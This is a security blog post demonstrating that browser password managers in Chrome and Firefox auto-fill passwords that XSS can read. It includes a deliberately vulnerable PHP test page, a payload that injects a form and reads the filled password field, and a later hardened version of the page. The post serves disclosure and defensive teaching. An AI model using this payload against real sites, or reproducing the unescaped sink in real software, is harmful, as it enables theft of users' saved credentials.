Let's look at password managers in modern browsers.

Table. Can an attacker steal a user's password stored in the password manager by XSS?

Browser | Auto filled | Can be stolen? |
--- | --- | --- |
IE11 | No (requires user operation) | Yes (requires user operation) *1 |
Chrome 55.0.2883.87 | Yes | Yes |
Firefox 50.1.0 | Yes | Yes |
Safari 10.0.2 | No (requires user operation) | Yes (requires user operation) |
Once Chrome or Firefox users save passwords to the password manager, an attacker can steal those passwords by XSS. (Chrome does not allow reading the password field without user interaction when the user arrives at the XSSed page via an `<a>` tag, but this does not appear to be intended behavior.)
In McDonald's case, an attacker had to find the encryption key and decrypt the encrypted cookie; these password managers don't require such complicated attack vectors. Just do XSS and read the password field!
Step 1. Input your ID/password and submit them to the server.
Step 2. Save password to your browser.
Step 3. XSS and steal the password from the auto-filled password field.
I put the sample code described below on my test server: http://133.242.134.241/exploit/password_manager.php
If you want to try the XSS from another site, please use this.
Sample code:
<body>
<?php
// Show the login form until an id/pass pair has been posted or the xss parameter is present.
if (!isset($_GET["xss"]) && !isset($_POST["pass"])) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
}else {
?>
Please click below to fire the XSS after saving your password to the password manager.<br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=id%3E%3Cinput%20type=password%20name=pass%3E%27%3bi=setInterval(function(){p=document.forms[0].pass.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">Fire XSS!</a>
<script>
// Intentionally unescaped reflection of the xss parameter inside a JS string: this is the XSS sink for the demo.
var a='<?php echo $_GET["xss"] ?>';
</script>
<?php
}
?>
</body>
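As an added example (not the post's own test page), here is the same reflection point written so the parameter cannot break out of the JavaScript string, plus a per-response CSP nonce so that only the page's own script runs. The js_string_literal() helper and the nonce handling are my assumptions; the PHP functions used are standard.

```php
<?php
// Added example, not the original post's code: the "xss" parameter is
// encoded for its JavaScript-string context instead of being echoed raw.
// Assumes PHP 7.2+; js_string_literal() and the nonce handling are my own.

// Per-response nonce: only the page's own <script> may execute, so an
// injected <script> or inline handler is blocked by CSP as a second layer.
$nonce = base64_encode(random_bytes(16));
header("Content-Security-Policy: script-src 'nonce-$nonce'; object-src 'none'");

function js_string_literal(string $value): string
{
    // json_encode yields a double-quoted JS string literal; the HEX flags
    // escape < > & ' " as \uXXXX, so the value can neither close the literal
    // nor the <script> element (the post's sink put raw input inside '...').
    // Invalid UTF-8 is substituted rather than making json_encode fail.
    $out = json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
            | JSON_INVALID_UTF8_SUBSTITUTE
    );
    return $out === false ? '""' : $out;
}

$xss = isset($_GET['xss']) ? (string) $_GET['xss'] : '';
?>
<body>
The xss parameter is reflected below as data, not as code.
<script nonce="<?php echo htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8'); ?>">
var a = <?php echo js_string_literal($xss); ?>;
</script>
</body>
```

With the post's payload in `?xss=`, `a` simply holds the payload text; no form is injected, so there is nothing for the password manager to auto-fill.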